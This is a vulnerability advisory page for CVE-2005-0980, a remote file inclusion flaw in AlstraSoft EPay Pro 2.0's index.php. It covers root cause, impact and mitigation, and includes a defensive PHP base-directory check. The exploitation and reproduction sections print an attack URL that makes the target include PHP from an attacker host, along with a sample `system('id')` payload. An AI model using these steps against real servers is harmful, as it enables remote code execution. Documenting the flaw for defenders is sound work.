VYPR
Unrated severity · NVD Advisory · Published May 2, 2005 · Updated Apr 16, 2026

CVE-2005-0980

Description

AlstraSoft EPay Pro 2.0 has a remote file inclusion vulnerability in index.php via the view parameter, allowing arbitrary code execution by an attacker.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Vulnerability

AlstraSoft EPay Pro version 2.0 contains a PHP remote file inclusion vulnerability in index.php. The view parameter is not properly sanitized, allowing an attacker to specify a URL on a remote web server that contains arbitrary PHP code. The application then includes and executes this code. This is described in the vendor's advisory [1].

Exploitation

An attacker can exploit this vulnerability by crafting a URL such as http://localhost/epal/index.php?view=http://www.server.com/evil where evil is a PHP file containing malicious code (e.g., a command execution script). No authentication is required; the attacker only needs to be able to send HTTP requests to the vulnerable server [1].

Impact

Successful exploitation allows the attacker to execute arbitrary PHP code on the target server, leading to full remote command execution. The attacker could then potentially compromise the server, execute commands, or access sensitive data, as the code runs with the privileges of the web server [1].

Mitigation

The advisory suggests using htmlspecialchars() for output functions and implementing a base directory restriction for file inclusion to prevent these vulnerabilities [1]. However, no official patch from AlstraSoft has been identified in the available references. Users should apply input validation and restrict include paths as a workaround. The vulnerability is not listed in CISA's Known Exploited Vulnerabilities (KEV) catalog as of the publication date.

AI Insight generated on May 24, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products

2
  • Alstrasoft/Epay: 2 versions
    • cpe:2.3:a:alstrasoft:epay:2.0:*:enterprise:*:*:*:*:*
    • (no CPE) range: 2.0

Patches

0

No patches discovered yet.

Vulnerability mechanics

Root cause

"Unsanitized user input in the `view` parameter is passed directly to a PHP include statement, enabling remote file inclusion."

Attack vector

An attacker sends an HTTP request to `index.php` with the `view` parameter set to a URL pointing to a remote server hosting malicious PHP code. The application includes the remote file and executes its contents, allowing arbitrary command execution on the server [1]. No authentication is required; the attacker only needs network access to the vulnerable application.

Affected code

The vulnerability exists in `index.php` of AlstraSoft EPay Pro 2.0. The `view` parameter is passed directly to a PHP include or require statement without any sanitization or base directory restriction [1].

What the fix does

No patch is available in the bundle. The advisory recommends using a base directory for file includes and applying `htmlspecialchars()` to user-supplied input to prevent both the file inclusion and cross-site scripting issues [1]. A proper fix would validate that the `view` parameter resolves to a file within an allowed directory and never accept remote URLs.
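
One way to implement the base-directory check described above, as an added example (not AlstraSoft's code and not taken from the advisory). The `views` directory, the `.php` suffix, the `home` default and the `resolve_view()` helper are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Pattern the advisory describes (constructed illustration, not the vendor's source):
//     include $_GET['view'];   // whatever URL or path the client sends is loaded and run

// Assumed layout: page templates live in one directory next to index.php.
const VIEW_DIR = __DIR__ . '/views';

/**
 * Map a user-supplied view name to a file inside the base directory.
 * Returns the canonical path, or null if the name must be rejected.
 */
function resolve_view(string $name, string $baseDir = VIEW_DIR): ?string
{
    // 1. Strict name syntax: no scheme ("http://"), slashes, dots or NUL bytes.
    if (preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $name) !== 1) {
        return null;
    }

    // 2. Canonicalise both paths. realpath() returns false for missing files
    //    and resolves symlinks, so a link leaving the base is caught in step 3.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $name . '.php');
    if ($base === false || $path === false) {
        return null;
    }

    // 3. Containment: the resolved file must sit under the base directory.
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Front controller: only a validated local path ever reaches include.
$requested = $_GET['view'] ?? 'home';          // may be an array (view[]=x)
$file = is_string($requested) ? resolve_view($requested) : null;
if ($file === null) {
    http_response_code(404);
    exit('Unknown view');
}
include $file;
```

Keeping PHP's `allow_url_include` directive set to `Off` in `php.ini` blocks URL wrappers in `include` at the interpreter level, independently of this check.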

Preconditions

  • network: The attacker must be able to reach the vulnerable index.php endpoint over HTTP.
  • input: The attacker must host a PHP file on a remote server accessible from the target.

Reproduction

1. Host a PHP payload (e.g., `evil.php` containing `<? system('id'); ?>`) on a web server the target can reach.
2. Send a request to `http://[target]/epal/index.php?view=http://[attacker-server]/evil.php`.
3. The remote code executes on the target server [1].

Generated on May 26, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

3